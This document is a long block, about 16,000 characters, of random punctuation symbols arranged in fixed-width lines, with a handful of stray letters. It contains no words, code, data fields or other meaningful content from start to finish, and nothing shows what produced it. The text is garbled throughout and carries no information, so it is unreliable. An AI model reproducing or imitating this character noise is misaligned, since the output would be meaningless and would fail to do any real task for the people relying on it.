_@*!^_%}@[$)#%($+!]!)(!}]+%!+*{%]$^*][%({]@][}!%_*)^]}+)[[)(!&{]$(^%#_$!#!#!}&#(
*!]((**^))({^]{#@}$_$^*)$+)!]}()^+^!_&{][%%^#}{#}_)&}*&@(@%[##@*(}+@$_#$%)_{(!$[
^!!+)*^^])[+{&++{[[##$**]]%^]_+*%*@%!{)@%(}*!#]@$]^@)(%$$+$#$[^_${)&_)!}{[+&[@}&
(]!@^](!![@#}%@][{*}$*!]{(!#})(&^^@${&)]$^(#}{***%{!&[%)!#%(%+(_@}^}*{^!${[)#}_#
%[_!#]_+(!%[&]+^%^&![^+##*&{_*[($#[@$%&${}_[_%)_*_&{#*#[!)&_#^}&&@#))]+{(&$##**+
^_*($_^)]#!%{]_[!@(&$}($!_#&!_&^%&((&#*{}[$}&@{&(]#&_+*}&)#^}([{$&(]^@@}]%))(&@[
)$)@+[(}(*%^%$](_)#*_+*%#+{{&^@*!@&([#}{+_#{(@&_%}(]]}^_}+^+@*)_(&}]$($&+@]&[!@{
{)*]%({&%^@))_)&(}*((_]&$+&(}_)]{$^+]$+}{[#[#$%]#(%+_(@*&!]@)&*${@#+&_#^_}+&@*&#
}&[)}${@([!+]$}@%(%$_)&#{[]@_*@$}$+!$)@]%@*}%^}{**#{]!$]{$%%))!{((^)[}+]}{{&*$)_
_[+%{{@)@(!*_]#]((^+!!{_&]^%[^!^)%]$]#_^%$^#{}^}+[]}@$)}*@$)*{![})}([_{_*&[[{{+#
{&@[@+(*@(&&^%*[_${%{^}[[_]*)[!%%)$)])]^#+&}#[^(}]{[$%^^)$$&_(_#)@_)!#}*)+]}{!!%
&@&!##}_]#[*^^&&^$!#^%{%{#$%]%}{%^_+&%_]#__*&*{%!(]#)^*+&@#[$)}}{%^}!#%)[{@!{&[^
$]$++##!$*((#[(+[&)&^&&{{{)+##)_${{(!^*{)^!)}%}@]#*^%_@@*#[*(_#((_}*}]&+}$+)[$)@
@{!%#&{+$]#%]!*[{$![%(^!$$$$+{!@!#+&]%%^_(@}^*@%+&[!%$[})($(([{@#]*{_[@#&(![{$_)
${([*!{!)(%&]*%@{^_%[__#%[^%({[][^{{$%!$[_$@${]!(+*@}$((_%{$$(]](}##[!{@[@_+))*[
^}%${(@^]#%*^#+}^]&#$&{}[[_!)[$[&)}#[$&%])_^)[)!_}{@^^###_#(#!*##[*_+@(!$%@%$)#_
@%%}@$*}(!(+_[&^([]%}(%@@]%_}#(@&$!]$_@^!@}$_{]@#($)$)!{*_%$)]#%]$)_^&@($*}^&_[^
)%}%]}&]$]*#^{]%^$}&$(#&+[[][!@&}$]_]({)(#!@_((^@@%%_]___%]][&}})]{%%}[#@__+%)(%
}_]*$$*_@+])&{$(+*+]!_[#&_)}{#)!^^}[%^+*})!(@}*@}$]))((@$(@[$_{@$^^@^*_%@%]_++(#
$$)*@&[%@((#**]*][{(@+#%_+_++!&[$%&#_#!#{_(^^@[}@&#$[[*!]+^{$]!}+[}$!$!&#$__$%]!
@]_$}*}____$%[)$]#++#!+*&{$$!@%^$*)}{]}}*)^(^%!]+$%_@%}$]++($#&&[](&^%&}!(]@@!)_
}%%*%(#+{@@_&[$+*{]&&$!*}#$$[]%+}@_&)[@+!%{@%()[*{@*[}&%@]#@*$${_^{}^{]]$_+[+)({
)@$)}^+#[$@!+&(@*^}}@{!#[][#[&)%%^#]_$}})_@{$&*&)+^#%}{__)}#%[[%_$[[)}()()^_#$%!
*+$}&_)_@!{(}*{[&!)$[&@^#(@(!#(#!*_}!++#{#(]}!))]!}(#**({]&{)$+)+&$[^!&&[&!^[*(^
#()#![_$)^@+@)[!_({(])+{)@$[$_&+*$%)+[[][+]@^}**((!%!$+&#][_#}$)_@!}[*%)$%@#&(@(
^[&[}#]_}{)#}_[#]+}@$[(%+&${[[+%&%]!&*(^(#)%%[+]@[+]#}#@#]}+_+}__[^$#+^)$$!^!)!+
$}##]]*&#[@()!)#([]@#+)^+{*&$_@_([[]^@_)+$#+)]*@!!]})}__!@##{[(&%![[)[*){@^[@(]+
&]{#%]__@_^$@&+$$@![@_#@[!%_!*{}}^%_]&$$!&&$#^^*[&!#%!&}%&}[^$$*([&(_*{{%{#&{{){
!^$(()[*&{]&&_}]+]#[[^]#}+#+($^&$[^!+$^!}+*[]%+]@]*^)}(%$}(+)^#[@}}[*!@]*[}[]^&_
#)]*%_}[{%[%!^][^^)^(_@$!_*)$$&&#]^##[)[#$$$_&$((_)[{+%[**^#{)%#^^_[]_&(**_(}(&}
)**$}#})*@$@*$^(]+)#^$]!^&]$#!#$+](!%(*^$@*!_]@_@){+(%*^^&*@]%+_([^^%}&%!#@_({+[
)[^[*+${{_)*@)){(}[{{{(@{$_}+@&}^^%)*@*!{(!%#_}!&++%&+_({!{!][)]!}!%[}_{{+@[*([[
[++#[^%_[*+(%)^@@+_+}(#*@!))!%@(!#_*_}$@!$)^($#]([@*)$#*%*_&_!%%[}_}](#$&+)_^[[$
_][[#@%!_})!]@$[}&&#)#_%[!%]*&)###}*#!^{+@[!%^)[%{}__]+%%{&)}!$!}}*&{{#++{_@{(})
)@%}{&]%!*#_#]+[][!+)[{$!{+*+($&@%&+)&#_&(@}}}}(*$+_((!!$[+{]@])_($($}]]+&)#][@_
@#]&{]$(%}$@^{$@]*%]_*}#}}!]^*&{+{_*$(##{{_^%#!}+^!$_}^)^{]+*@_{{&+)^$[_[[!+)^)^
!#]]({_*[%((+(+%&+&$[]++{!{)})_*^{[$^+(+%({!(@{#(^[(%}*$_**[)+#*&*[_%{*@)_{%(@}#
_+@+_!]#]([[*]}]}#]$)[^+%}+]#@%@&%^%@$(%(^+@$^_$_((*{[&%{}^$[_&_}!%(^$[+%[[}!@@#
*}+^@){^#%}]{!#^]]!#}{{$][}%[*)#^}@![$@%!&)^]^({![#{$*@*%@+_@%@%*)@]+%[[++$(#{@_
)]$%]*[*$(}&}%)}{&(_^}{_*[^}$(+*}(!_{[_!@*[+}*&+^^]]@@{^+]^%}!^{)_}!%%&@)$]_(*@@
!^]}()*+{{}$@[{)+%}[{)$&@[{*%%@(%(@[+%@_^%$+#@[^{*%[++&%*({_]])(@!%!#*$%$}{+{+}[
{})$+)](^}{_&+%!}^&[)_%{(_#[{[[!$*&*&!%*%+)&+++!^#&$%@})$^{(+{)(@{(@]!^!%_)}*#$$
{{}}^)@[$]^%*#])#(]%&)]+}_*{_}{*!]+]%$!!)&%#](*^[)]&_&[}[}$}*&^{@}*(#*{+!%)++*@_
%]{#@+_&$^&}_{(#)*!{%+#+()+]{&[+#]([{%^_)+{!)+()!%*#__##^*!_+((%@_@!+[&![_*[$*}#
}]_)^&{]#@({}+_&!+#_([+)!#[%#{[}+&+(!%*{}^#)%)&^()^{((^^((%{#^&!%_%*+%{)$)^_}$][
#@^%+(!{$}+_+]!#^[]_&!{]_]]]&($}^)}&*}}(#(%&$%*__{)!])[(%)#})$*$_]^($*[^{+(^}}&[
](}}^](^{%!*[[[[_#&)_(#&$[#&&+&^]$])^}((#%_)+%]}@]*{*({[{${!+@[@_%]!(}!$%]*%[}_%
}&_]*_@$!}{}(]#)_#)%[)!+!${}(}_(}^@{_@!#*_()#$!_]%#@}[#{@)!{+{!&(]}][_#%*^#%!{!!
*%&[$$]+@){!{($$*!}]{$!{+^+*%%%!{%^$(!$)%^{(&)!{!^^]#$]%#^@!^(]$$^!^]@&*{)_())!(
+)]!(*@#%$&)]]*))%$!#$@{]$#^@]__!*]^}#(#+$_#+@$+]{)]{(]]*__%&%$_^+)${$$&^{%^%){%
][(%_[])+!(&][#@_%+{##@($($#@}#}!(}*+}_(_[]+{^@@}@@^(&@[(+({+$^^_%*!##]%]#}$({)[
[@%**}){@}}[*!@@)^]*+%{!}&+^*]}&#{*[{}]]^#!%_@!}*+(#*$@@{&}_$^^[_[@[%}]@}{])!+*@
@)(}&*@+*$$*@&&^](+#%+)+@*]_%}*^@*_!#@%)$![*&#&[]&%@}_}$]{}&^{%+{})#%%$[+*#!@{*[
%{#)&_%^(@&)#$#*@+*)$)+]_+#[$((@%[%&!%#!{_^^]{]@%^){(+!)#_^!_[+!*{*)&&*&]#{[[^!{
_*]#*_{$(!(&#@%&+_$&}@^+]+[(@{[))**![&)*&#]]]*)_&+!^#]
{!!!]_}#&+^&)&[^@#)[[}}]@+$#_^@}*%#++_)_&*)#*}][&@*_%_!#*^!}[[}]*}}+*_{!#%(&&)+$
*#+}+^)&)^+&{)^$*}}%@^+@%^)}!!%#+_@*(*]+)+_@#*}&%&*}[#!{@@%&_$)[]$#!}${_+!({]$}[
{!!@(+})(%!{+#+${{})(@*+@@&{@&+&$&&[&&&^###![)&#))@@_*!([^$$%$#[&[&+%}$*)[+$%!*%
@*})[_+@!]#$^^@@$&$)!#[!#[_@@@]_*$}^^[]@_{(%#*[^[#[[}@{__+@!#{[&)@&)^#()$^+*[@!+
}%{^*)@[{#)%)]{_*__^%!@)#[![_}[{(}]@[)]%(&^$+)%_#&_)])[(}(!&[(&(]@@$!&@&!&*!_}&!
#+{@$^$%#]$([**&_{)}#!(((@$#%})+#++(__{%#}+}!)%#^**+!}%+}})#}[@^**!*_+_++&}_^_**
&^+_(}@{((][#&)*__!$#(@_^{{)}_^$[+)!}@&*$$^{&&()%[+!&#&^]}{%{!@{[}$_#[#$[(_)&%&#
{}[_(}*$$)@!{@]{+&!+#@*}_]^[}&%&_^^({}{]!![^}+^(!{+[%})@][}]}[#)}]%{{%&!#^#_^[+^
@&{!+%{&$_#}(*!@]^+!@+!&$)++@[)^^##@+@*(}))%))%{}%((!%_*]!^)(!$^[}](!+){@++]]^%@
#+(][{!##}^{)$##{*^+#}$)+(*%)&&*[!]]^(**@{+[^%^*){{&$&[{}!]_$@]!#$@[(]^%&%$]!%$+
^*_%#}%+[$^#!#*+}_)!%+[)$%}(@+**)(}{$%!{}!!{^!@__{+#+)*]+[@_}+*^(&^}]]@)($(]&_*!
**#$_##%([*#%(*+^(@&_((*)*$%%+_@])}&$%+*$$+{#^&}[#$^*_][}]@](]+#&*[#+*%(&*&(%*[]
^])^%]*+_&{)}^!!@%$#*]*^&{[$^}[$}@%[%%@$+^]#)}^&})#)@]^&+}#!{**+(@+}}&^()$)#%)]_
$()#}$%}@^_()+[!(!*($##%!)$])$+@*[{)&+)&%+}[[}^_#}#*&(^)@[_*^[%$}%)#)#!](+([%*+)
$&$!_]+&)}[_%[%(!!#*}&(][_@}+@*+&&_{_(#%(!!+{&}_@$#^!#&}}@[%_$&]*$_^}%)^_({][}$}
#]{%($@%%]&)))$*^%+]^^&{*&#[))]*(+]*{[!_#[}]{_^%!_{[{%#]}{_#]&^^^)+!^{*_{+[}*#+)
[_)^_}_]&![!+&+_#@*%_#]#!&^!*[#{+%]{{]*%$}!*}$#$_[%})##}}_#}%]_}@*^]*@^(_)}+^^!+
*^]*([&{{#%{[{&@%)%+&!^&]^**}+_!!_(#&}{@@*}({^&!^*)^]%_**((@++#&)@&*%[]]+!$_[*^]
+$!)(%[{]{((_{*}%+_$+&_)^}@@^*+!(_@($&@()]]]&!{_++(^^_{_[!$[*!%@(][(]_{!(}%[*!])
!]%+@*+@#$^)^[^^)&#}#($*#&)}!#[*]%[}#*}_@(]}+*]]^)_(%&}*^+%#*%&{^}%(}]{$+)!*(&&&
+]$^@#_@[{!+^)}}[)_([!%[{(%)@)&^*{!)%&)&!$@]}@([*(^#%@^&))%*[[}_((@&)]+]}}_))(}*
!_}}]@#&({_#@{&))$^@@*@}]*+[*%)+[[{&!!^$($+]#$@)*%*_^{_^%)__!&$+#]#**)+*@+@%#]]{
*_[)+)*((]!{@^!@]%(%@[]^%[&$+^}$$@&{_(!*}$]%_#_!%*++}_])]}$@+&#(]$*[+[)&)([@+])_
[+!%^#%)!#_}]#]]_)]^**_^)^%&$$)%!*!+@#*[^&@^}^[{(@{%(![]#{&%[$]))(}[)^(({_&*#}*}
[+(]+@){$(@!{%$%)$+{$!$$&*^+&@)%}![)*]{^%#(+{}![_&[@]+!@*^}}{})++_${_&%!@((@]{$#
{+@&[}^&%%$&())#!_##$!(&@@*}^[%@$^#*&!@@&_[(!}+{}*&+{**$)}])%()!_&_)!*((^+%)_#[(
_^&!&(%{_%*[($])}%[{@{{^_[$}@&&_)^()({%![#][(}+&^(]&}!*@#{)]{i]%_]%^(&]^{+_([)$%
{&*[$@^{(]@}]%)(@&}&)}_@$}&]{#$^}@@&[]#+!%^]@!]]$+$]#^_]{](^*&!%_!!&}$^&#!}++)_!
^@]]*$*_#+$!^{$&[$_+#^@@}#)(#*&)$#&+#}+{{&@$^%+{++[&}#}[*#]^^()+(#![]^$)^#*])%((
*[)]#!]$]{+([^)%@{^_$!(*@}#@{{^%@}#&##*!_&^{%$_{_+%)#{{!$[&&]#^)+!]*&]{[!^)%}}*%
_{{$%_+*^{+!*!$)}*)_&%@[$*!&*#][!!&#{]$}}]^_$*!*&]&(@%_$*@+!{}^^+()+_$(!]*@)&#[#
(#[@!$[+{_{^%+&}($[^^}${^_[#)({)++&_%*{@+(^+_%!_)%)^+@#(${)*]&!)^{[#%+[*))(${&{#
&$+#])%@_*}{[}$!{#}!^%*)++$]&]!_{_+_]%#&@&$&)*!(]+_+}}]_+#){[^]#^+)$#!)&)[+#[)}}
)*(!%&]*{$+(_()_%$#_{}[]_%#{![}}{(!@{#$[*&(^((*+^(^(_]%{!]}+^)%^{{$**]@$$$_!]((%
(&[${_&)}[$$_{$[]{#{%%!&@(#+%@%)+_}&*##]!&^_[^[*]([*!]]!]{#*!^&$!*)!}_#{_#*[%[^)
[!*@]%*[_^!#{{)@![$+^__[]{($+}}{}[$[]^{+(*(^)&*&#^][@{&@)+^*{%@^)+++&!&[{(@{!]{]
)%$]{()*{)[)}@&@&@%^#{*]@@]&_]!))$^(%@+@+]&}]+{*[]+(!_{]@_[(]_][}}_}@[_}##+@]]]*
+@*_*[&%%(_++!{]*+&(*%%@{!!*%!*^}]}$&}#[+*&+@((#](@(&*{+](#%!%[%]@#+[_+(^[*&[}${
($@]^)!&_*]#{#&}({@](*_{!{*})%}#&#_][%)]$_*&(]_*%]%$(&+$(#+[][*{]&+^+!&^@}$}(}]$
]*%@_+!}&+}_}[%^]#&{{+*%$&_#}#*]&%%})$+]@)+^})[&(+@$)^#)${@_(%!($]}^!{@}){+@!__)
$]&{*%#]_!$&@$(}#^{]!!%^%_#&!$+$&%^_#((#)$@($[+}^[_+$@}_)]*!^$!{^)@&*[[%!_&*$_$#
^+][](^[]^^($_#[+})__}@{{%_%*&_[)!}+[!@&*}}$#%**#}%})_^$^}}&+*}({(]_!*)#[%(!+_%*
)+@%[+#$(+%@%%%_{+&_&_]()$][)(${{@(+}+_$_!+##@@&}[#+!(#+!){))@*+((}@#![!)&(@@)(]
^#!+{_(_$+!!%##{[{]($+@)#&$%)))&[&*!^%+]!#]^#{)][()**$^_!@)^}%$}+_]+{[]*_}[[*)*{
{+]@[!%)@&^^@$%!!({##_#[}[+@_*@]&@[]}${((^[{][]+#%![(_{[*)#}]@{]#(^])_&!%{^!#%{@
_]}]!^_[!)&&&]_(#]+_!_}&&)#$*+^###[**@{}{%^[&#+&__@@@[+t]+&)^{*((@$!$)%]$[{}$}&$
%!+$[(*%](@*!*})!#+*#+(}$(*@*[#]#)[^*#@}*_#%@@+@[!!{*^})_!^&^({(%(%%@(#_(&{__[!+
(#})___!{^@*}#(%#)_]_%{{]+@%${+![^{(*$+)$[&[${)&#%+$![{}(@^+}]#(}@#]}($($[$[+{}(
&}+%*$[(_+{#!+]@)%#)}_+{%&*)#^[$@_@}[^*+_*(!%&#*^@)@%^[@%*$_{}{{%[@^+%[$])])@[!^
+#@$%^@^#%}+)*!+!$%(}](&)##$+&[[#&^*!^$]*!#}{%#{*+&[]$)]%}*[*_)*#@^{%)}{+$^)_{$(
%){!}(#]^_(!^]({%@_@$%*{*@)*#!%$(*_(]!#*#%[*[&*)^[%&$_)!$[_&($]]%{!%&)[(]&{[[[{+
{{@]+](@&@$_^^(*@})$!}{@$_^+{*)[({^}_!#[@$[*%!%^_*@@}#_{[{_@**++)!]!@{_#]&&*{+&$
**^[)[%$_^)*)_%+]&_[)&$}}_]%+%)}^_]#}]__]*!}&#[[##![$[)%+_))_&)$_(@&@}&&{)+#_%![
]}(^#*@^)$$%[%*(({(^]}_$+^%{$#*#^+({)[*}@]+![&%_%&_$#@[$^+@$(##[[$}+*$!@*!{_@})&
}![+_#}%{{_$}}+]+#{]#+$![@(!%_&$$}+^*{^#^^[&&(^^##**$_{+*!]}][}&&%]]*&(}{+@+!]({
!$@+[&@)]_!__})]+]+&{_($!$)#$)&$]&&}{!^$)$}(!@%$%(!+*!*#)+$&_&[[]})^#]{$}&@$^{##
]#%@+!^)$^+&^_{({+[}#()_(!*_@$}}!}*+_[@^{{{#+)%&&&}*{*))+}&[#++{}%@(]_@$![$$$&^*
__}$)$+%$%(*^@)++@!*%]^){]]_}]++$!()&[{*^$%+]+*_{[{$[#*[[%^}]&_[^@^+@@^)#)${$^&+
(}$)][$&}#*_&+%#)(%^){](*]}}]}!+[)##&!^!+{_!@&^[[(#{[&#%$!(#{__}#&@$*}#^*#]@!}^_
!^$!@y{$][%@+^##](_*(##^_{#)$+$*&}[#%&_!+)*@{][_($#_$*{(}_[{+)$[)+{#)+($_]{}!]+#
(#_$!@*+#%+(#@_}}@^!$_[&_&@})}}$(]^]^(_^**@%**#&^+@[!]^+}+&+&[^()+$*$(}$!%@!({^[
)]*{(%#[_%{}(+!##[)%&!((^[}&(!#^!([)[&!_)(%&#@)&*$+]&!]^#!!^$*^$!(_+![]*{!${@%+)
^#)$#{}]%%$(*}(]#&&$)@_&+)%}}*(([]![$!!^&[%!{&^(&@&%$)@{!@}!}$_*$%+#]{])@!@)@_)]
}]{_}!%{^$))&_(+}+#&+*&+!{_*^)[}(((}_@(]^)_}!]}&}{&[((}@{+(([{])_}^(@^+^+^}(!)&]
_%*}_!^#[*$_+]@&#+{*@*+{)]^^!](]_@^}#^^%(*+]@^@]$*%_$#^*@[$]]_)]$+$+@*{$[}[%*{+)
(&{@%^+*}^(^&_+$#(@$[#@@(){!($)^)!])(_&%#*&[@{]{]#@(]%@}{${[})($+++@*${+&}(^%)+*
{#]!#)]*&@)+#[+_)@&}+]+_*}}]*{{%^!+$+#$(%!^**!])%*_}$]!)({$^_^+]*#{(_*[&!(*))#@&
@^%@@}]]}%#%]{{#(#**[#(_#(#$]]*)_*#+[_#+}{&!]@&[]+{*^]!%^*_@)]^%#++$&@[)([+}!*](
&%+(&])^[)@$](**}]&}$]&%^]@)[&(*[(#^{$+^]@[%![_{[#_[){_$)!%![]^_%*$!@+{[&%)!_#((
$)[__^{%_!]_#[&_$(!)!_&}&$$}](]%{^(&{%$!]+[+_^+{*[@+*+%[$@&#+#$*}&{@%##*@(({)_(]
}_)[^$}^{[$@^$@$&##)@[#$&$&_@]@{_][{}!(+[!+@%&^&[%&${()@@_[&+^^+{)#^#)&%_]@{$&(*
{()}$]!%*+{[[}!+][_*!&]{%+)!^)!*{{})_&[*[})+[(@!__!{!]&{^@%!@]&[&^}+#[{_}@!+_*{&
^[%#!^]+(*#&))([%[%$_[#_+{{_%!#&)^&#)#!](+(@!(}}*#(&&+%!}@]%@#$*_[$](#[@#[_^+(%{
@#(*!__{)_#^!{!&%_*@+*(&[^_(*$#!@_*}#+$_*${@!}*]!}@)$^@_@{^(++(%({[#$)!}!##%]&[{
!(+}(*!(&_[}}{}+#{!#)_[!)&))%%#}_!]${*}@})_)}%+&#$]&(^*[^+&{)}+@((&]])%$@((_(^$[
_@$)[[+(!@]_()}*]*+[{&@&[##}[&]%$](+*{]!%)]_&%^$+%_@!#&+@[(&{){)(]+[]{)!^}+!}{[$
{)@_&{_[^++^{[%*!(]]@_]}_})(%+_#!+]$$_&!+*[(])$(!^($)}^+{&!&__+_{@+}[((&%)$][^{&
*{_%#&${{!@$)$(@%{{*%[+[*@#$[@_{}{[#($}}_)%)&+*]((}*)+_%#{%]_$]%][!+[+[%[@&&){!@
(&(+*[($}**}$^_!@]_{%#{](]@{!#&&&)[$!_(#(#$!*![##!$_!*{{$@@*_!#[%)}%^%(%#$@(}+}$
_#@&({+)+}^*]^!^})[(^@)*+#@]%_(**_+}###[_}]*$${]&_[&{[*}+@#}&^{]_!&#{%())](^@}%*
$[%@##)(@__+{#@^_$}}$)}]#^^@#&_^++!$^^%%#($+]&%&+]}^+_@%$})*$^*&*+[##@_{(&}@^*]_
_$_[@%#[+***&@%!^{}!$#}](_({@]]{)^$]^*[*]+}}!({)
[%%(@_${[(#@%*_+^]{}+^{}!)&#}*#%(##))%(+[+@!}$^}](!_$%}$&([#%}[##*[#*]{$^#*(^+[^
}!&]!%!+@){](^(*}^_!$%]^[&*)_^}!@]*+((!^+_$+]_%[@&+(*@}}+}!]#})!*}!)+@}^}_+*#+^!
)#$_#{&)!$@]@@[#(!]^&^+!_+@^!&[*!)(*)*&[{_@%$!__!%%[#$(%#(]$$![[@!^#%(_)#!{%]]*[
+^$@$&!^%+!^[_}&*$__@}{])%)((}_^)(%^)$@}#)]_)[)#{!}*^&&__}!{&)]#_)[$$%@{@$&*@)#{
^#{}%^&]+}(%$@+{*^})]@^#^#]@$%([[#^(%[)]%#$}}*_$]}^]*$@#%$#[^[[%__*#@)(_![{${{{$
^*{##%*!!&]{_[$#_]!&{(!@*(+%*[%_($]*#)($)%][^]#+}[+_{})@)}*&(]{(&(}%%@(++$}@(#[_
}(#[(@])[+(^$}}+!){_&*)&&$((+[+)+#&]!@^+]}[#}$!*$_}_$__@^))$*){%!@}_){(@^($)_&^%
]))^)^][&$+)[!(#!()(&[%(&[@$*!{]+{{$(#^&_!!%@)%[@_(+^]#@$]#*!$%#()@++&}+%[[_#(*]
#!&&([_}[+]]*%_$+(^[^)$*#{+{!$%}_*!%_([{*^{*(#}&[$@[[_^$&!()*(({]##$@@&@$}&#{#@!
&_@+){!($$(_}++&+*%@[%+([)(}!%%{$_{@$[*}_!^)#+)+{*&)^]+[$^))+{(++%*^!]({!&^}&_(_
[&^#)(&)[)}[}}+$]*)+)&_{%}(!}(+%(]+*#([+*##{()_(}}[%[]*]{${+(&)}]){)_^}[]()}#$@%
]_}(_]&}[&#%!{+@(##({^[+#_)]@!$]_@+[[%*_)}]([$}}*+#$+{$+_{}^][]{!^!#^{{_$}$(%)+[
[^%]]+@}_%){$%&[@!*{){)%##(_{!#(![#*(^@{$$))#}@_]{#_@{)]#!]!#&^]!@^_++(^($)^#^%}
*($%[*(++@_([!@)%&%^])&&]_%*_+)$[+)){_[)+*+**)][_@@!]&[%@$(!#__@]+_{$@+*+)_[%^}[
(++$%*@_](}_(+!}!(%!*([&#[$@]#}+@@%^[]&^[%]+[{!_#+{(*)!*+@*}+(+!*+#@[@#!)#*[]#%&
[_%^!#%_]$}#+[+&[@)_#]+$%{]*_%#}}&[}#*(!))@_+@$}$#[]}*@%!}^^&$%&]_@}!!}}{_{&#_&}
$@$+(*!{{{_}!+[}$+_)_++$+}$({$^!*_@]$&^${%$}_!%_{*_[$+)@%+{%&_^%%!+_([$_]+&&%_%[
*]+[!%[^_*+&*$(&@@(+)$!(!#)}!}{+*)_^_*^(}^}+}][&*_@#%{^!&{)%_](**_%&%!!{${#+@$#^
%)^!^$!$#*^]$*}&{]#{*]!{%%+_({%)%+}&$%+_(}_^(%{*++!@^}*_{([[_#_++@+(*&$(%+)+$}[)
[!}&#{$+_@&_!}){{$(}[{*@%[(!@]!{&&%$!#[[(){%#%_^#_{_!}$!{)$$#&_^){[(#&$_^{%$!^}!
((*&@}}&$)!*@$}*^!]+]))!!*%^[%(+[{!(_%]&^$[#!#]{+$+]*}[[*@&&!+^#%!})&$]{*(&+@&+^
{$!#&$[$}$!][@{%@$$$}([{)(]*+$!}$*$&+@%[$*)#]}_&_#@{^#@!@@%+@([)]}{!_[@^+^%]{){&
$@(%@)^]*]&%%_%*#[@(&]])#$#!$%$}@{}!}[[@}#@#](@)$%{&)}[&][[_%%(!!(}%([[){^$@[@[}
%#**%{@_)%{@{*[@#(+&+%[]{+&{}_*[%#!!**+{{_^+@[[@^}[$@(}@[${@@}!*@!(%{}!#*_[&^@[%
)]!)(*(@]#@{%_*+@_&(&*$+&$$$$)+}+@$&)@}}+_*}!(){@@@]%]$}@%@())$^]!]*{!^!$&!([*%*
{]){#}@!+*%(#((($+(_++)*$%#!)$*[]_%)]&}@_{#]]&!##&$$)&^@&{*!{{[))(*{([^*&$})@$*{
}]]}%}!!*_%_(^%{%&*)@^&]]_!*[*{[^%[(]%]*!+])[*(!}&^)]#{&&%*)$[(]#(*@^}[(!](+_[%[
%@&!&*_]^#*_$]^$}^]##+_}*@)%{@[$$#)$*_&)+()@*@&^_${[@%&&$[!+_)#^_${+!&{[#^^(*)&!
#%(^&!+$@!)_*##{[&]^+}(](+%#*%#&##!(]%)!($#!^^)!(_$*!_]&%@#}**+@&+])[%$%@$!]$[!@
%*}_@^$%^]$&#{+]!({[@}&{+@]!{&!&)#((&&(!]!_$}_!!(#}#&&[@_]+%%[_]!}%###*&}&]^^[[_
}[}^*{+]@_)]@)_#*+]+$}+]{]!+&}}}@@)&{*+&#*}#*)__*@@!]!]}}#{!$}*@@@}#^{{!}##^!&@!
)##!]#$[@!{*%+)*#+__)_(%}^*#&[*}{_@&+[]_*[[}[@{]][@)#[%(*$[*{%@]]#${)!%_!*}+]$_)
})_%())]{(]^+)[+)#^{*_^([%]&*+_)][%^&*)++^&{]+]$&_+[@!%$_([&%%!@!%*)+(}]+)()!#}{
(^*&^{[!#$](%_!_**!}$$!&[^{(!#{#@_&^]{)[*+^](!&!(@^(@!@]%+]$(#%_}+)$@}&!#&&{^*{]
+%[!{!$((^_+&]_!@^%#_+}({^^}*{{%]^@&+${%%^[*!#}_(_&&)!$}!_^{[(&$][(%_+$^&}#&((#^
!&]{[+)@}%![(#*)$+$#){)[^+@^_)]%$#}!&}&]$&{*&[$!}%$]&_}[*$^)%&{]}]![[^_}(#{^*!!&
*&[(_{{+}($[}$*()&}$&#%!%#)]{@&$)[}&{&_%_[(((%@{]_*^(!+*[[(*}@]%_}])^%+%&([]}{*&
+![}{([&]$^[+{*]()&!&@}^#+][(!^*^+^&&$#]_{@$+@[({]&)!&)))&#*(%+*&}$^_*+_&@[}{}%^
{_$^+%+@(&@[[)}*@{!_$)@((_*^_$${*#{_#{%@()[@(+$#[)!#*^!(}{!@[+%[&_%()+#%%{)}^)$*
&(@%[{^&%^({(@$*(**$}+)%}&)!+$[((&)@]@@+{{]])]]^$#(@%)!(&&]+#+[&[&}$__$$@$+]@{*#
{]@]@*)!])})!}!%[+$)@)]](}*&!}]+![##]])]_[](+${+]_*@)_^{}&^)_*{*]#[]*{+{)(*&^_#_
&[#_)$){$*!)!){$*$(]{]_&%%}$@&[**+![#{$}]@$$[@@]@{[#])^$***+_#%@$%]{_+}&*!&_%&()
$]*&[)#(%^{]%^)])@#{!^@(@)#+}{$}@_${_(_}[^[+#*&^{%!%+$)){_]*%+(@^{_*#$*(!)[*[&))
^&+^@!!!+])*@__%__@${%#_(^@@*}!&])[#%_!%}!%{@}#!)(_*^@*_)$&_+!#$)&}#_&$}%!{^!#&^
)_)$}%^+_!*$(@%}}@)})}_&{!@^^!&_]**!*[[()]*%(]}!#))+*@($%)+){!#@^+}@((*@[}&%#{_+
{@^+!([!)_!+@+}_+^!%_([(+)($@&@##($_&!@##$%+$@#[_[$!^&*])!&(_]*]}&)[(((]}%[@&[^@
]{*+&_)#!(@&#+((&!%!%}^*&[]#$*^}}$]&(&_{}+_}$%#&%[&}*)*]]&+!_)#[^+%_*}]])+$)%!]{
]##]^($^_)}[}[[)}{++}+(^%^!}}%)&[}${{*+&+@%}&(})@)+%!%_*(*[!+$_)[!#!@[%)@^}(#*%+
#]$]%^)$!{]&_[%%*}_#_)__^[^^#(})}&^%%%_&}&$_$!&{![*^}#+@!*){%)+!]_&*[$)%[)!{]!#^
[{*__(+#_)+^%(%]_%@[++[((^*($_*(_!*+$+[&!(*_[{{&}&%*%@#&%[#*_[_&@&]__+{@$)^%_#$^
@@%!+%+]_{{}*{[]+^*$!]&[$+_}{])]$]*##__##{#!!&)%!@^!!*+#}_{^)%{^*(}])]@$_!__)!#+
@%({&[^${{_{}#([{+{]!@((&*@!)*[}$}(]%+#@$%%&!%&]@$(_][#)))@$+}@%*#^^@%&]}{()%%^!
#&&)++!(}{]}*}}!}(@*@!]^%*!$_[($)!_^^$_[#!(%[!}#&$)@$}#$))&)[##**@](]]$)}}[^@@^#
}&&){[$${&}+[+%_}!#^#%{]_%#%*&_}}+]&_$*!&&][_%!]_*+#^!]{}_!@(}(*(^^*__+$#@#^]*%%
%]^}!_{}!)%!{)%+[___]]$](*^)))*^${)^^$_&[)&}*}($#{#^^#_@[[+[^{{[*__{%$^$}*{{+#{{
$%&+])(^^*$(}#*[$_#%$}!!^%&($}!!(]*{!}(!_&{##[{!+]&#(((%@]!($#%$^@(%))@_)@}*})+[
^]^(}${[(^!*{}!(_[{^*&{&})]]&}![}$!}*+])}[@(_&)[}*@_$_{%[+&#(*_#+)^)!&@!%($!}#[%
[@&[+^@$}&{]{)+^&^#{{}@!}{^{%}#)@!%([$(_!([+({)@^(#@!)$[_&](!}@$*$@!(#[$+!@][}_*
_^#&{)][@*!])^))+@+$%[%&}(^(!@}([#+***_*[^)$((^*(}([!]@##@$%^[{+^**{&[&@@##)#(@#
{+_**$%(#$&^$^]__*)%$*+{#+()[%[(}#]}*&$^%]{}%&(_([]&_}&}*@}#{((&!@!{#+__#*#))&[(
&[[*+]&{[$_}*#@!{]}__!+!!@$@#}+@!%^(^_^{}]+^({)*[**%!@[^)#$%{&[[_!(^(}}{!}!)@###
